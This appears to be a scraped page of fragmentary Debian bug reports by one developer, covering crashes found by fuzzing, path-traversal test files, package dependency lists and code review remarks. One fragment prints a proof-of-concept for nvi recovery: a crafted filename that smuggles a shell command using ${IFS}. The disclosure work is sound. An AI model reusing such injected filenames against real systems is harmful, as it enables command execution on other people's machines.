cture: i386
Versions of packages cppcheck depends on:
ii libc6 2.27-3
ii libgcc1 1:8.1.0-1
ii libpcre3 2:8.39-9
ii libstdc++68.1.0-1
ii libtinyxml2-6 6.2.0+dfsg-1
ii python3 3.6.5-3
ii python3-pygments 2.2.0+dfsg-1
--
Jakub Wilk
Easy work-around for pdf2djvu: add the "fontconfig" package to
Build-Depends. It will take care take of creating the UUID file for
/usr/local/share/fonts/, and then FcDirCacheCreateUUID() will be mostly
no-op.
--
Jakub Wilk
the build-dependencies.)
--
Jakub Wilk
same way for ld?
Yes.
* Do cross toolchains also need such a symlink?
No. (Although I suppose it wouldn't hurt either.)
* If yes, where to place it? (They use a different directory layout.)
* Which make variable contains the correct path?
$(gcc_lib_dir) would be my guess.
--
Jakub Wilk
via /run/systemd/system)
Versions of packages gcc-7 depends on:
ii binutils 2.30-15
ii cpp-7 7.3.0-16
ii gcc-7-base7.3.0-16
ii libc6 2.27-3
ii libcc1-0 8-20180414-1
ii libgcc-7-dev 7.3.0-16
ii libgcc1 1:8-20180414-1
ii libgmp10 2:6.1.2+dfsg-3
ii libisl19 0.19-1
ii libmpc3 1.1.0-1
ii libmpfr6 4.0.1-1
ii libstdc++68-20180414-1
ii zlib1g1:1.2.8.dfsg-5
Versions of packages gcc-7 recommends:
ii libc6-dev 2.27-3
--
Jakub Wilk
arning: EOF while reading header (continuing anyway)
- PDF syntax warning: EOF while reading header (continuing anyway)
Ideally, this should be fixed in Poppler by cherry-picking this patch:
https://cgit.freedesktop.org/poppler/poppler/patch/?id=e491e935ea355d48519cf0a14e4b060655850675
--
Jakub Wilk
/tmp/moo
/tmp/moo
--
Jakub Wilk
Control: forwarded -1 https://github.com/jwilk/ocrodjvu/issues/22
Control: close -1
This bug was filed in Debian BTS, because there was no upstream bug
tracker at the time. Let's close this bug in favor of the upstream one.
--
Jakub Wilk
* Adrian Bunk <b...@debian.org>, 2018-03-05, 18:50:
pdf-unicode.cc:29:10: fatal error: UTF8.h: No such file or directory
This was fixed upstream in 0.9.8:
https://github.com/jwilk/pdf2djvu/commit/e263c43bbd552a771f74f0f93ce9cca8b1aa8702
--
Jakub Wilk
if (int($major) >= 2 && int($minor) >= 12) {
">=" compares numerically even when arguments are strings, so the int()
calls aren't needed here.
More importantly, this will break when Git 3.0 is released, because
int($minor) >= 12 will be no longer true.
--
Jakub Wilk
Connecting to git.openstack.org (git.openstack.org)|104.130.246.85|:80...
connected.
HTTP request sent, awaiting response... 404 Not found
2018-02-24 14:16:48 ERROR 404: Not found.
--
Jakub Wilk
I suggest replacing
(?:[^:]|$)
with
(?!:|//)
qw(git clone -c protocol.file.allow=user --)
qw(git -c protocol.file.allow=user clone --) would be better here.
The difference is that the former unnecessarily puts
protocol.file.allow=user in the repo's .git/config.
--
Jakub Wilk
f packages urlwatch depends on:
ii python3-appdirs 1.4.3-1
ii python3-keyring 10.6.0-1
ii python3-minidb 2.0.2-1
ii python3-pycodestyle 2.3.1-2
ii python3-requests 2.18.4-2
ii python3-yaml 3.12-1+b1
ii python3 3.6.4-1
--
Jakub Wilk
$git_url !~ /^(?:https?|git|ssh|file):[^:]/)
{
SSH protocol has an alternative (and I guess more popular) scp-like
syntax:
[user@]example.org:path/to/repo
There are also two syntaxes for local repositories, although I think
neither should be allowed. It's *web*checkout after all...
--
Jakub Wilk
56694fa4, leave_original=true) at util.c:407
#123290 0x565e17da in output_file_now (from=,
from_needs_removal=0xffb1c3f3, from_st=, to=0x0, mode=32768,
backup=true) at patch.c:1869
#123291 0x565e18c1 in output_files (st=0x0) at patch.c:1949
#123292 0x565dfe9c in main (argc=, argv=) at
patch.c:683
-- System Information:
Architecture: i386
Versions of packages patch depends on:
ii libc6 2.26-6
--
Jakub Wilk
diff --git a/x b/x
--- a/x
+++ b/x
@@ -1 +1 @@
-a
+b
k to the
canonical document about option injection but I cannot find a link.
IIRC it includes how to get RCE with tar/cpio/etc option injection. Do
you remember where that can be found?
I haven't heard about it.
--
Jakub Wilk
Package: qa.debian.org
User: qa.debian@packages.debian.org
Usertags: pts
On <https://packages.qa.debian.org/d/dash.html>, "browse source code"
points to <https://sources.debian.org/src/dash/unstable/>, which is 404.
--
Jakub Wilk
nd
a way to exploit it for anything nefarious.
--
Jakub Wilk
loited via git-remote-ext:
https://github.com/sociomantic-tsunami/git-hub/issues/197
https://github.com/seveas/git-spindle/issues/154
--
Jakub Wilk
Source: gzip
Version: 1.6-5
Severity: wishlist
Please add
Homepage: https://www.gnu.org/software/gzip/
to debian/control.
--
Jakub Wilk
Control: notfound -1 1:1.7.1-2
Control: found -1 1:1.7.1-1
Bad submitter.
--
Jakub Wilk
Control: forwarded -1
https://lists.gnu.org/archive/html/bug-tar/2016-09/msg5.html
Tags: -1 + fixed-upstream
http://git.savannah.gnu.org/cgit/tar.git/commit/?id=c2886473a803 (which
is included in tar 1.30) fixes it for me.
--
Jakub Wilk
Source: libxss
Version: 1:1.2.2-2
Tags: patch
$ apt-cache show libxss1 | grep git:// | xargs git ls-remote
fatal: repository 'https://anongit.freedesktop.org/git/xorg/lib/libScrnSaver/'
not found
--
Jakub Wilk
From bb62d415b80f8eeeae5c1163ab2801dfba475c97 Mon Sep 17 00:00:00 2001
From: Jakub
Source: xorg-docs
Version: 1:1.7.1-2
Tags: patch
--
Jakub Wilk
From ad5c7b737e4ed890f727a1c4c08c2eb800e2701a Mon Sep 17 00:00:00 2001
From: Jakub Wilk <jw...@jwilk.net>
Date: Thu, 25 Jan 2018 22:02:54 +0100
Subject: [PATCH] Fix debian/watch.
---
debian/watch | 2 +-
1 file changed, 1 ins
r example, if this sentence were embedded in a
binary, Lintain would find the misspelling: even though the misspelled
word is short, it's part of a longer chunk of text, which would be
spell-checked.
--
Jakub Wilk
s ext3.
The --sort option was added upstream in 1.28, so I guess this should be
closed.
--
Jakub Wilk
rchive-dev to Suggest and the following text
(shamelessly stolen from #662718) to the package description:
The man page describing the tar(5) archive format can be
found in the libarchive-dev package.
--
Jakub Wilk
Source: tar
Version: 1.29b-2
Severity: wishlist
Please add:
Homepage: https://www.gnu.org/software/tar/
to debian/control.
--
Jakub Wilk
1.6.6-1
ii sphinx-rtd-theme-common 0.2.4-1
--
Jakub Wilk
/etc/pulse/client.conf.d/00-disable-autospawn.conf
-- System Information:
Architecture: i386
Versions of packages apparmor depends on:
ii libc62.26-4
ii debconf 1.5.65
ii python3 3.6.4-1
ii lsb-base 9.20170808
--
Jakub Wilk
is caused by a bug in Pillow:
https://github.com/python-pillow/Pillow/issues/2926
--
Jakub Wilk
0055cad3f88a91 in main (argc=7, argv=0x7fff0e6cf958) at
./psi/dxmainc.c:86
-- System Information:
Architecture: amd64
Versions of packages ghostscript depends on:
ii libc62.26-4
ii libgs9 9.22~dfsg-1
ii debconf 1.5.65
--
Jakub Wilk
djvu.ps
Description: PostScript document
-distro-info 0.17
ii python2.7 2.7.14-4
ii python 2.7.14-4
--
Jakub Wilk
* Clint Adams <sch...@debian.org>, 2006-11-08, 18:06:
you could lobby to get 'type' or your favorite option added explicitly
to debian policy.
The relevant Policy bug is #747320.
--
Jakub Wilk
+xsa245-0+deb9u1
ii libxenstore3.0 4.8.2+xsa245-0+deb9u1
ii zlib1g 1:1.2.8.dfsg-5
ii qemu-system-common 1:2.10.0+dfsg-2
ii seabios 1.10.2-1
ii ipxe-qemu 1.0.0+git-20161027.b991c67-1
--
Jakub Wilk
I've retired from sponsoring. Sorry!
--
Jakub Wilk
* Jakub Wilk <jw...@jwilk.net>, 2018-01-04, 21:01:
$ export TAR_OPTIONS='--owner root --group root --mode go-r'
$ tar -cvvf foo.tar /dev/null
tar: Removing leading `/' from member names
crw--w--w- `/dev/null 1,3 2018-01-04 18:42 /dev/null
Valgrind suggests it's a use-after-free:
I
depends on:
ii libacl1 2.2.52-3+b1
ii libc62.26-1
ii libselinux1 2.7-2
--
Jakub Wilk
-perl 0.27-1
ii librole-rest-client-perl0.22-1
ii libstrictures-perl 2.03-1
ii libtry-tiny-perl0.30-1
ii libtype-tiny-perl 1.002001-1
ii liburi-perl 1.72-2
ii libyaml-perl1.24-1
--
Jakub Wilk
-langs > /dev/null
real 0m0.367s
user 0m0.333s
sys 0m0.032s
--
Jakub Wilk
Package: ocaml-doc
Version: 4.05-1~exp1
OCaml 4.05 is now in unstable, so documentation for this version should
be uploaded to unstable, too.
--
Jakub Wilk
libc6-dev 2.25-5
--
Jakub Wilk
2:3.3.12-3
ii python33.6.3-2
ii sensible-utils 0.0.11
ii whiptail 0.52.20-1+b1
ii dialog 1.3-20160828-2
un zenity
--
Jakub Wilk
diff --git a/which-pkg-broke b/which-pkg-broke
ind
0.52.20-1+b1
ii dialog 1.3-20160828-2
un zenity
--
Jakub Wilk
diff --git a/which-pkg-broke b/which-pkg-broke
index 4f53139..c0bd621 100755
--- a/which-pkg-broke
+++ b/which-pkg-broke
@@ -9,12 +9,15 @@ import time
from string import *
from stat import *
riate ioctl for device" doesn't make sense.
--
Jakub Wilk
-quiet --retry=TERM/30/KILL/5 --pidfile $PIDFILE
--name $NAME
But consolation doesn't create any pidfile, so I can't see how could it
work.
--
Jakub Wilk
gssapi-krb5-2 1.15.2-2
ii libidn11 1.33-2
ii libk5crypto3 1.15.2-2
ii libkrb5-3 1.15.2-2
ii libncursesw5 6.0+20171125-1
ii libsasl2-22.1.27~101-g0780600+dfsg-3
ii libtinfo5 6.0+20171125-1
ii libtokyocabinet9 1.4.48-11+b1
--
Jakub Wilk
real0m0.012s
user0m0.007s
sys 0m0.005s
--
Jakub Wilk
of packages consolation depends on:
ii libc6 2.25-2
ii libevdev2 1.5.7+dfsg-1
ii libinput10 1.9.2-1
ii libudev1235-3
ii lsb-base9.20170808
--
Jakub Wilk
1.11.0-1
ii python3 3.6.3-2
--
Jakub Wilk
Package: mutt
Version: 1.9.1-2
The package description says "This package is built with the NeoMutt
patchset", but this is no longer the case.
--
Jakub Wilk
=500 ouid=0
-- System Information:
Architecture: i386
Versions of packages man-db depends on:
ii dpkg 1.19.0.4
ii groff-base1.22.3-9
ii bsdmainutils 9.0.14
ii debconf 1.5.65
ii libc6 2.25-1
ii libgdbm3 1.8.3-14
ii libpipeline1 1.5.0-1
ii zlib1g1:1.2.8.dfsg-5
Versions of packages man-db suggests:
ii groff1.22.3-9
ii less 481-2.1
ii apparmor 2.11.1-3
--
Jakub Wilk
esw5 6.0+20170902-1
ii libpcre3 2:8.39-5
--
Jakub Wilk
nullptr.sh
Description: Bourne shell script
busybox depends on:
ii libc6 2.25-1
--
Jakub Wilk
A38: run_applet_and_exit (appletlib.c:927)
==2180==by 0x10FADC: main (appletlib.c:1032)
...
Found using American Fuzzy Lop:
http://lcamtuf.coredump.cx/afl/
-- System Information:
Architecture: i386
Versions of packages busybox depends on:
ii libc6 2.25-1
--
Jakub Wilk
oob
ii libicu57 57.1-8
ii libobjc4 7.2.0-16
ii libstdc++67.2.0-16
ii libwavpack1 5.1.0-2
ii zlib1g1:1.2.8.dfsg-5
--
Jakub Wilk
overflow.lha
Description: application/lha
nd I confirm that it fixes the crash.
--
Jakub Wilk
0x5663fa47 in main (argc=4, argv=0xff8ada24) at fig2dev.c:412
-- System Information:
Architecture: i386
Versions of packages fig2dev depends on:
ii gawk 1:4.1.4+dfsg-1
ii x11-common 1:7.7+19
ii libc62.24-17
ii libpng16-16 1.6.34-1
ii libxpm4 1:3.5.12-1
--
Jakub Wilk
;
If the string length is 0 (or 1 is some cases), this writes outside the
buffer.
--
Jakub Wilk
Information:
Architecture: i386
Versions of packages gcab depends on:
ii libc6 2.24-17
ii libgcab-1.0-0 0.7-4
ii libglib2.0-0 2.54.2-1
--
Jakub Wilk
oob.cab.gz
Description: application/gzip
on:
ii gawk 1:4.1.4+dfsg-1
ii x11-common 1:7.7+19
ii libc62.24-17
ii libpng16-16 1.6.34-1
ii libxpm4 1:3.5.12-1
--
Jakub Wilk
overflow.fig
Description: application/xfig
386
Versions of packages nomarch depends on:
ii libc6 2.24-17
--
Jakub Wilk
by CU at offset 0x66a8 [in module
/usr/lib/debug/.build-id/78/69c51149fd48e2dab7696d4ffc419fd0df1795.debug]
are you experimenting the same issue with build in unstable ?
Yes.
--
Jakub Wilk
(0xbe70f1b6b2031b76)
referenced by CU at offset 0x6738 [in module
/usr/lib/debug/.build-id/78/69c51149fd48e2dab7696d4ffc419fd0df1795.debug]
-- System Information:
Architecture: i386
Versions of packages clang-5.0-dbgsym depends on:
ii clang-5.0 1:5.0~+rc2-1
--
Jakub Wilk
ary code as user "nobody".
PoC exploit:
$ echo 'X-vi-recover-path: /etc/fstab' >
'/var/tmp/vi.recover/recover.moo;z=$(pwd|head${IFS}-c1);apt-get${IFS}moo>${z}tmp${z}pwned'
--
Jakub Wilk
5.1.0-2
ii zlib1g1:1.2.8.dfsg-5
--
Jakub Wilk
bigvla.ar
Description: Binary data
57.1-8
ii libobjc4 7.2.0-12
ii libxml2 2.9.4+dfsg1-5
ii libxslt1.1 1.1.29-2.2
ii zlib1g 1:1.2.8.dfsg-5
Versions of packages libgnustep-base1.25 recommends:
ii gnustep-base-runtime 1.25.0-2
--
Jakub Wilk
#include
#import
#import
int main()
libjs-underscore 1.8.3~dfsg-1
ii libjs-sphinxdoc 1.6.5-2
--
Jakub Wilk
perl-debug depends on:
ii perl 5.26.1-2
ii libc6 2.24-17
--
Jakub Wilk
ader.pm line 128, line 1.
-- System Information:
Architecture: i386
Versions of packages perl depends on:
ii dpkg 1
Package: tracker.debian.org
The "testing migrations" box on https://tracker.debian.org/pkg/libkal
reads:
د اÙÙ
ØÙ
Ùد٠(Ahmed El-Mahmoudy)
--
Jakub Wilk
s of packages dpkg depends on:
ii libbz2-1.0 1.0.6-8.1
ii libc62.24-17
ii liblzma5 5.2.2-1.3
ii libselinux1 2.7-2
ii zlib1g 1:1.2.8.dfsg-5
ii tar 1.29b-2
--
Jakub Wilk
traversal.deb
Description: application/vnd.debian.binary-package
libcap2 1:2.25-1.1
ii libtinfo5 6.0+20170902-1
Versions of packages zsh recommends:
ii libncursesw5 6.0+20170902-1
ii libpcre3 2:8.39-5
--
Jakub Wilk
Package: clang
Version: 1:4.0-37~exp4
Severity: wishlist
Please ship /usr/bin/sancov -> /usr/bin/sancov-4.0 symlink.
-- System Information:
Architecture: i386
Versions of packages clang depends on:
ii clang-4.0 1:4.0.1-8
--
Jakub Wilk
2.24-17
ii libcap2 1:2.25-1.1
ii libtinfo5 6.0+20170902-1
Versions of packages zsh recommends:
ii libncursesw5 6.0+20170902-1
ii libpcre3 2:8.39-5
--
Jakub Wilk
uaf.sh
Description: Bourne shell script
3.6.3-1
ii python2.7.14-1
--
Jakub Wilk
.
But there's no such info page.
--
Jakub Wilk
n:
Architecture: i386
Versions of packages ksh depends on:
ii libc6 2.24-17
ii binfmt-support 2.1.8-1
--
Jakub Wilk
epends on:
ii e2fslibs1.43.7-1
ii libblkid1 2.30.2-0.1
ii libc6 2.24-17
ii libcomerr2 1.43.7-1
ii libss2 1.43.7-1
ii libuuid12.30.2-0.1
--
Jakub Wilk
sigfpe.ext2.gz
Description: application/gzip
Source: llvm-toolchain-5.0
Version: 1:5.0~+rc2-1
I tried rebuilding this package with DEB_BUILD_OPTIONS=noopt, but it
didn't work: there code was still built with -O2.
--
Jakub Wilk
ormation:
Architecture: i386
Versions of packages ksh depends on:
ii libc6 2.24-17
ii binfmt-support 2.1.8-1
--
Jakub Wilk
i libc6 2.24-17
--
Jakub Wilk
ends on:
ii libc62.24-17
ii debianutils 4.8.2
ii dpkg 1.18.24
--
Jakub Wilk
Package: pax
Version: 1:20161104-2
The tar_rd() function does:
pt = &(arcn->name[arcn->nlen - 1]);
without checking that arcn->nlen is greater than 0.
-- System Information:
Architecture: i386
Versions of packages pax depends on:
ii libc6 2.24-17
--
Jakub Wilk
)
by 0x10D15E: list (ar_subs.c:104)
by 0x109DD6: main (pax.c:296)
Address 0xd81ec390 is not stack'd, malloc'd or (recently) free'd
-- System Information:
Architecture: i386
Versions of packages pax depends on:
ii libc6 2.24-17
--
Jakub Wilk
ing American Fuzzy Lop:
http://lcamtuf.coredump.cx/afl/
-- System Information:
Architecture: i386
Versions of packages pax depends on:
ii libc6 2.24-17
--
Jakub Wilk
zip
--
Jakub Wilk
traversal.tar.gz
Description: application/gzip
tem Information:
Architecture: i386
Versions of packages nomarch depends on:
ii libc6 2.24-17
--
Jakub Wilk
oob.arc
Description: Binary data
Adding forgotten attachment...
--
Jakub Wilk
#include
#include
int main(int argc, char **argv)
{
void *p;
return posix_memalign(, 0x10, SIZE_MAX - 0x20);
}
6b in main ()
-- System Information:
Architecture: i386
Versions of packages libc6 depends on:
ii libgcc1 1:7.2.0-8
--
Jakub Wilk
ion:
Architecture: i386
Versions of packages e2fsprogs depends on:
ii e2fslibs1.43.6-1
ii libblkid1 2.29.2-5+b1
ii libc6 2.24-17
ii libcomerr2 1.43.6-1
ii libss2 1.43.6-1
ii libuuid12.29.2-5+b1
--
Jakub Wilk
oob.ext2.gz
Description: application/gzip
vfs 1.34.1-1
ii libglib2.0-data2.54.1-1
ii gsettings-desktop-schemas 3.24.1-1
Versions of packages nautilus recommends:
ii librsvg2-common 2.40.18-1
un gvfs-backends
un gnome-sushi
--
Jakub Wilk
traversal.tar.gz
Description: application/gzip
oredump.cx/afl/
-- System Information:
Architecture: i386
Versions of packages maildrop depends on:
ii courier-authlib 0.68.0-4
ii libc62.24-17
ii libcourier-unicode1 1.4-3+b1
ii libgcc1 1:7.2.0-8
ii libgdbm3 1.8.3-14
ii libpcre3 2:8.39-5
ii libstdc++6 7.2.0-8
--
Jakub Wilk
0x0, mimesection=0x565749b8 "moo",
extract_filename=0x0, argc=0, argv=0xd584, extract_func=0x565587d0 ) at
reformime.c:656
#1 0x56556ee5 in main2 (argv=, argc=,
mimecharset=) at reformime.c:1181
#2 main (argc=, argv=) at reformime.c:1226
--
Jakub Wilk
f packages maildrop depends on:
ii courier-authlib 0.68.0-4
ii libc62.24-17
ii libcourier-unicode1 1.4-3+b1
ii libgcc1 1:7.2.0-7
ii libgdbm3 1.8.3-14
ii libpcre3 2:8.39-5
ii libstdc++6 7.2.0-7
--
Jakub Wilk
...
(Note the "-Wl,-s" option.)
--
Jakub Wilk
ii libharfbuzz0b1.4.2-1
ii libjbig2dec0 0.13-5
ii libjpeg62-turbo 1:1.5.2-2
ii libopenjp2-7 2.2.0-1
ii zlib1g 1:1.2.8.dfsg-5
--
Jakub Wilk
crash.pdf.gz
Description: application/gzip
is not set.
-- System Information:
Architecture: i386
Versions of packages reposurgeon depends on:
ii libc6 2.24-17
ii libpython2.7 2.7.14-2
ii python3 3.5.3-3
ii python2.7.14-1
--
Jakub Wilk
0x5665fa20 in tmalloc .../procmail-3.22/src/ecommon.c:21
#2 0x56655b61 in getsender .../procmail-3.22/src/formail.c:222
#3 0x56658fce in main .../procmail-3.22/src/formail.c:628
#4 0xf6f17285 in __libc_start_main (/lib/i386-linux-gnu/libc.so.6+0x18285)
...
--
Jakub Wilk
4.0-dev 1:4.0.1-3
ii python2.7.14-1
--
Jakub Wilk
601 - 700 of 7735 matches
Mail list logo